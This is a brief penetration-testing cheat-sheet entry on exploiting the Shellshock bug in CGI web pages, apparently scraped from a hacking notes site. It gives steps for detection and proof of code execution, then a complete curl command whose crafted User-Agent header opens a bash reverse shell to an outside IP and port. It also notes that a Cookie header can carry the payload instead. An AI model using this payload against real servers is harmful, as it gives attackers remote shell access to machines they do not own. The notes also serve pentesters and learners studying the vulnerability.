CGI
shellshock
(step 1) - Testing for shellshock Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
(step 2) - PoC that we have RCE (you could also make a ping or web request to yourself and monitor that oth tcpdump) (step 3) - Reverse shellcurl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/10.10.16.2/4444 <&1"' http://$IP/cgi-bin/test.cgi
other
reflected
Out-Of-Band Use Cookie as alternative to User-Agent